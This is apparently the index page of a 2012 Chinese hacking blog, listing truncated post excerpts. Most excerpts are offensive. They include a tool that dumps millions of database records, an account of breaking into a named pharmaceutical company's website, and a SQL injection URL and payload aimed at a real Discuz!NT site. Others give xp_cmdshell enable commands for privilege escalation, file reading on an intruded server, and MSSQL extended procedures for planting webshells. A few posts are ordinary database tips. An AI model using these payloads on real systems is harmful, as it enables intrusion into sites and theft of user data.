ASP 连接 MySQL 数据库两种方法

分类:安全 | 2012-07-17 | 撸过 801 次
0人扯谈

一般都是用myodbc来连接。首先,在系统中安装 Mysql 的ODBC数据库驱动。如安装稳定版本是3.51.下载地址是:http://dev.mysql.com/downloads/connector/odbc/3.51.html。

下载安装好后。在控制面板-->管理工具-->数据源 (ODBC)中的“驱动程序”页中如果有MySQL ODBC 3.51 Driver就说明驱动已经安装成功,就可以开始写程序了。

下面是我测试时使用的程序,里面有说明就不再介绍了。

方法一:

<%
'设置MySql连接属性
'各个变量说明:
' myHost:MySql[......]

继续阅读

K8-MSSQL综合利用工具V1.1 可秒脱百万/千万记录数据

分类:工具 | 2012-06-15 | 撸过 1,747 次
0人扯谈

 

程序:K8-MSSQL综合利用工具V1.0

语言:VS2010 C# (.NET Framework v2.0)

作者:拉登哥哥 QQ:396890445

更新历史:

2012-06-09

[+] BCP导出txt(可导出整个表) 秒脱百万/千万记录

测试导出CSDN 640W数据 仅需10-15秒

[+] 导出htm格式(可导出指定列) 只适合100W以下记录

[+] 修复空格(数据库名/表名/列名)不能导出的bug

[+] 修复纯数字列名/字段不能的bug

[+] 显示当前要导出表的记录总数

下面使用BC[......]

继续阅读

修正药业官网被黑!

分类:安全 | 2012-02-20 | 撸过 458 次
1人扯谈

今天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入

可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看

果断的是注入点 后来验证是sa
[......]

继续阅读

DNT存在SQL注入漏洞

分类:安全 | 2012-02-19 | 撸过 469 次
0人扯谈

注入地址:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1

利用:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%[......]

继续阅读

mssql 清除木马

分类:技术 | 2012-01-31 | 撸过 377 次
0人扯谈

代码如下:

drop table te

drop function dbo.mdSQL

select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,systypes c
where b.xtype='U' and a.id=b.id and a.xtype=c.xtype
and c.name in ('text','ntext','varchar','nvarchar','char','nchar')

go
create function mdSQL(@tbname varchar(10[......]

继续阅读

SQL2005过滤单引号的注入方式

分类:安全 | 2011-12-23 | 撸过 411 次
0人扯谈

其中 爆列名有点麻烦

mssql 2005

 

1:

 

and 1=(SELECT @@VERSION)-- 判断数据库版本

 

(master.dbo.sysdatabases 表存放着sql2005数据库系统的所有的数据库信息

 

查询命令:user master;

SELECT * FROM MASTER.DBO.SYSDATABASES

 

系统默认的数据库有:1master 2tempdb 3model 4msdb)

 

2:dbid变量爆数据库名称

 

AND 1 IN (SEL[......]

继续阅读

mssql_sa下常用和不常用提权操作大全

分类:安全 | 2011-12-6 | 撸过 590 次
0人扯谈

1.
开启和关毕xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- 关毕xp_cmdshell
EXEC sp_configure 'show advanced optio[......]

继续阅读

MSSQL读取文件 命令

分类:安全 | 2011-11-10 | 撸过 741 次
2人扯谈

这两天一直入侵一个网站 各种提权

包括

mssql:SA

mysql:ROOT

主机是星外的  可以看到目标目录

数据库是ASP的 不能插马

无奈找了很多人都木有办法。。。

今天无聊中查看目录 发现有一个高人上传了一个WEBSHELL

在网上找到了办法 发现用MSSQL读取文件的办法 现在分享一下

    Use webshell.cc;--(这里是随便选的一个数据库)
  drop table cmd;
  create table cmd (a text);
  BULK INSERT cmd
  FROM 'd:/freehos/webshell.cc.asp'
  W[......]

继续阅读

MSSQL数据库日志满后快速解决办法

分类:技术 | 2011-09-30 | 撸过 315 次
0人扯谈

先提供一种复杂的方法压缩日志及数据库文件如下:

1.清空日志
DUMP TRANSACTION 库名 WITH NO_LOG
2.截断事务日志:
BACKUP LOG 数据库名 WITH NO_LOG
3.收缩数据库文件(如果不压缩,数据库的文件不会减小
企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件
--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了
--选择数据文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了
也可以用SQL语句来完成
--收缩数[......]

继续阅读

3个MSSQL扩展,可用来获取WEBSHELL

分类:安全 | 2011-09-20 | 撸过 456 次
0人扯谈

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'

打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'

解包,可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'

读文本代码

 

要求权限:

master的dbo权限

第 1 页,共 2 页12